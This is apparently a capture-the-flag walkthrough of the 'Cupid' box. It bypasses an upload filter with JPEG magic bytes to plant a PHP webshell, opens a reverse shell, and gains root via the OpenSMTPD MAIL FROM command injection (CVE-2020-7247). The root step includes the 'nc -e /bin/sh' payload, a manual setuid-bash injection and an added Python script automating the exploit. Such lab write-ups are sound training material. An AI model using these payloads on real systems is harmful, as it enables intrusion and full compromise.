Hack. Sleep. Repeat

TEE HEE HEE! Cupid is an imaginary character. However, Cupid is not the only thing that is imaginary on this system (the box security is equally imaginary)...

Tickle cupid the right way and you'll be surprised.

Enumeration With Nmap

nmap -p- --min-rate 10000 -oA nmap/allports -v

# Nmap 7.91 scan initiated Thu Dec  2 20:33:19 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v
Increasing send delay for from 80 to 160 due to 67 out of 222 dropped probes since last increase.
Increasing send delay for from 160 to 320 due to 73 out of 242 dropped probes since last increase.
Increasing send delay for from 320 to 640 due to 34 out of 111 dropped probes since last increase.
Warning: giving up on port because retransmission cap hit (10).
Nmap scan report for
Host is up (0.15s latency).
Not shown: 51513 filtered ports, 14021 closed ports
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
# Nmap done at Thu Dec  2 20:34:57 2021 -- 1 IP address (1 host up) scanned in 97.69 seconds

The full port scan shows only one open port, so let's run nmap's default scripts and service detection (-sC -sV) against it.

nmap -sC -sV -oA nmap/normal -p 80

# Nmap 7.91 scan initiated Thu Dec  2 20:38:46 2021 as: nmap -sC -sV -oA nmap/normal -p 80
Nmap scan report for
Host is up (0.17s latency).

80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to Cupid's homepage

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec  2 20:38:58 2021 -- 1 IP address (1 host up) scanned in 12.04 seconds

Only HTTP is exposed, so let's go straight to the web server without wasting time.


Interesting. Let's check the page source.


There is a hidden upload form in the source:

<form action="upload.php" method="post" enctype="multipart/form-data"> Select image to upload:<br/><input type="file" name="image" id="image"><input type="submit" value="Upload Image" name="submit"></form>

The form is hidden in the rendered page, so open the browser inspector and edit the HTML to make it visible so we can use it.


Now we are talking. Let's try uploading a file, first a PHP file and then a JPG, with Burp Suite intercepting the request so we can see what the server does with it.


That is rejected. Let's change Content-Type: application/x-php to Content-Type: image/jpeg in the intercepted request and see whether that changes anything.


Same error. Let's upload a valid JPEG image to see how the server responds to a good file.


A valid JPEG gets past the type check, but now the size is the problem: the server replies that The maximum file size supported is 39 bytes. That is far too small for a real image, so this is getting interesting. Time for some tricks.

Creating A JPEG File

└─$ touch muzec.txt      
└─$ echo -n -e '\xff\xd8\xff'>muzec.txt
└─$ file muzec.txt  
muzec.txt: JPEG image data

The bytes ff d8 ff are the JPEG start-of-image marker, and file(1) classifies the 3-byte file as a JPEG on those alone. Let's upload it and see whether upload.php does the same.


It uploads, so the server is checking the magic bytes and nothing else: the extension does not matter. Now let's build the payload.

└─$ touch shell.php
└─$ echo -n -e '\xff\xd8\xff'>shell.php
└─$ file shell.php
shell.php: JPEG image data


The PHP that will run our commands has to go after those three bytes, and the whole file still has to fit in 39 bytes, so let's confirm the size before uploading.


Within the limit, so let's upload it.


Uploaded, and the response gives the path where it was stored. Let's request it.


Now let's pass a command to execute through the webshell's parameter.


Command execution works, so let's get a reverse shell back to our terminal.


I used a Python one-liner reverse shell to get a shell back to my listener.


We have a shell as www-data; now let's get root and finish.

Privilege Escalation

www-data@cupidme:/home/ETSCTF$ ss -tulpn
Netid  State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
udp    UNCONN  0       0                              *
tcp    LISTEN  0       128                            *  users:(("ss",pid=2330,fd=5),("bash",pid=2241,fd=5),("python",pid=2240,fd=5),("sh",pid=2218,fd=5),("python",pid=2217,fd=5),("sh",pid=2216,fd=5))
tcp    LISTEN  0       128                            *  users:(("nginx",pid=39,fd=6))
tcp    LISTEN  0       128                            *
tcp    LISTEN  0       5                              *

There is a service listening only locally on port 25 (SMTP) that nmap could not see from outside. Let's grab its banner with netcat.

www-data@cupidme:/home/ETSCTF$ nc -vn 25
(UNKNOWN) [] 25 (?) open

The banner identifies OpenSMTPD, so let's look for a known exploit.


exploit-db has a Python 3 exploit for it (the MAIL FROM command injection, CVE-2020-7247, fixed in OpenSMTPD 6.6.2), so I downloaded it and transferred it to the target.

www-data@cupidme:/tmp$ ls
www-data@cupidme:/tmp$ chmod +x
www-data@cupidme:/tmp$ python3 25 'nc -e /bin/sh 1337'
python3: can't open file '': [Errno 2] No such file or directory
www-data@cupidme:/tmp$ python3 25 'nc -e /bin/sh 1337'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

Back on our netcat listener we have a shell, and it is root: OpenSMTPD runs the injected command as root while delivering the message.


That is the scripted route. A quicker way that needs no exploit script at all is to talk to the daemon by hand and put the command straight into the local part of MAIL FROM, here copying bash to /tmp/root with the setuid bit set:

www-data@cupidme:/tmp$ nc -v localhost 25
localhost [] 25 (?) open
hello cupid
500 5.5.1 Invalid command: Command unrecognized
HELO cupid
250 Hello cupid [], pleased to meet you
MAIL FROM:<;install -m 6755 /bin/bash /tmp/root;>
250 2.0.0 Ok
RCPT TO:<root>
250 2.1.5 Destination address valid: Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 19966164 Message accepted for delivery
221 2.0.0 Bye
www-data@cupidme:/tmp$ ls  root
www-data@cupidme:/tmp$ ./root -p
root-5.0# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
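The manual exchange above, as an added Python example (mine; not the exploit-db script and not the writeup's own code). It scripts the HELO / MAIL FROM / RCPT TO / DATA / QUIT dialogue, checks every reply code, and runs against a constructed stand-in that answers the way the transcript does and records the command a vulnerable daemon would have handed to the shell. The 64-character local-part limit and the 553 reply of a patched daemon are assumptions to verify against a real target, and the greeting text is constructed.

```python
import re
import socket
import threading

# Assumption: the local-part length limit usually quoted for this bug; check it
# against the target's version instead of trusting this number.
LOCALPART_MAX = 64


def injected_sender(cmd):
    """MAIL FROM address for the CVE-2020-7247 injection: the local part becomes
    ';cmd;', so the semicolons close and reopen the shell command line OpenSMTPD
    builds around the sender when it runs local delivery, which runs as root."""
    if any(ch in cmd for ch in "\r\n<>"):
        raise ValueError("CR, LF and angle brackets would end the address early")
    local = ";" + cmd + ";"
    if len(local) > LOCALPART_MAX:
        raise ValueError("local part is %d chars, over the assumed %d limit" % (len(local), LOCALPART_MAX))
    return "<" + local + ">"


def smtp_inject(rfile, wfile, cmd, helo="cupid", rcpt="root"):
    """Run the dialogue from the writeup over any SMTP reader/writer pair.
    Returns [(command, reply code)] and raises on the first unexpected code."""
    script = [
        ("HELO " + helo, 250),
        ("MAIL FROM:" + injected_sender(cmd), 250),
        ("RCPT TO:<" + rcpt + ">", 250),
        ("DATA", 354),
        (".", 250),      # empty body; the command runs when the message is delivered
        ("QUIT", 221),
    ]

    def reply():
        line = rfile.readline().decode("ascii", "replace").rstrip("\r\n")
        return int(line[:3]), line

    code, line = reply()
    if code != 220:
        raise RuntimeError("no SMTP greeting: " + line)
    log = [("<greeting>", code)]
    for cmdline, want in script:
        wfile.write((cmdline + "\r\n").encode("ascii"))
        wfile.flush()
        code, line = reply()
        log.append((cmdline, code))
        if code != want:
            raise RuntimeError("%s -> %s" % (cmdline, line))
    return log


def fake_opensmtpd(conn, captured, patched=False):
    """Constructed stand-in, not the real daemon: answers like the transcript and
    records the command a vulnerable build would pass to the shell. With
    patched=True it rejects the bogus local part instead (553 reply assumed)."""
    r, w = conn.makefile("rb"), conn.makefile("wb")

    def say(text):
        w.write((text + "\r\n").encode("ascii"))
        w.flush()

    say("220 cupidme ESMTP OpenSMTPD")   # constructed greeting
    in_data = False
    for raw in r:
        line = raw.decode("ascii", "replace").rstrip("\r\n")
        if in_data:
            if line == ".":
                in_data = False
                say("250 2.0.0 Message accepted for delivery")
            continue
        verb = line.split(":", 1)[0].split(" ", 1)[0].upper()
        if verb == "HELO":
            say("250 Hello " + line[5:] + ", pleased to meet you")
        elif verb == "MAIL":
            m = re.match(r"MAIL FROM:<(.*)>", line, re.I)
            injected = bool(m) and m.group(1).startswith(";")
            if injected and patched:
                say("553 5.1.7 Sender address syntax error")
            else:
                if injected:
                    captured["cmd"] = m.group(1).strip(";")   # taken verbatim, as the bug allowed
                say("250 2.0.0 Ok")
        elif verb == "RCPT":
            say("250 2.1.5 Destination address valid: Recipient ok")
        elif verb == "DATA":
            in_data = True
            say('354 Enter mail, end with "." on a line by itself')
        elif verb == "QUIT":
            say("221 2.0.0 Bye")
            break
        else:
            say("500 5.5.1 Invalid command: Command unrecognized")
    r.close()
    w.close()
    conn.close()


def demo(cmd, patched=False):
    """Client against the stand-in over a socketpair; returns (log, captured cmd)."""
    client, server = socket.socketpair()
    captured = {}
    t = threading.Thread(target=fake_opensmtpd, args=(server, captured, patched))
    t.start()
    try:
        with client.makefile("rb") as r, client.makefile("wb") as w:
            log = smtp_inject(r, w, cmd)
    finally:
        client.close()
        t.join()
    return log, captured.get("cmd")


if __name__ == "__main__":
    for step in demo("install -m 6755 /bin/bash /tmp/root")[0]:
        print(step)
```

Against a real host you would hand smtp_inject the rfile/wfile of a socket connected to localhost:25 instead of the stand-in; the stand-in exists so the exchange can be exercised offline, and the patched mode shows what a fixed daemon's refusal looks like to the client (the RuntimeError on MAIL FROM).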

The -p flag matters here: bash drops an elevated effective UID back to the real UID when it notices it is running setuid unless it is started with -p, which is why id shows euid=0(root) while uid is still www-data. That is the box. Thanks for reading, mate.

Greeting From Muzec
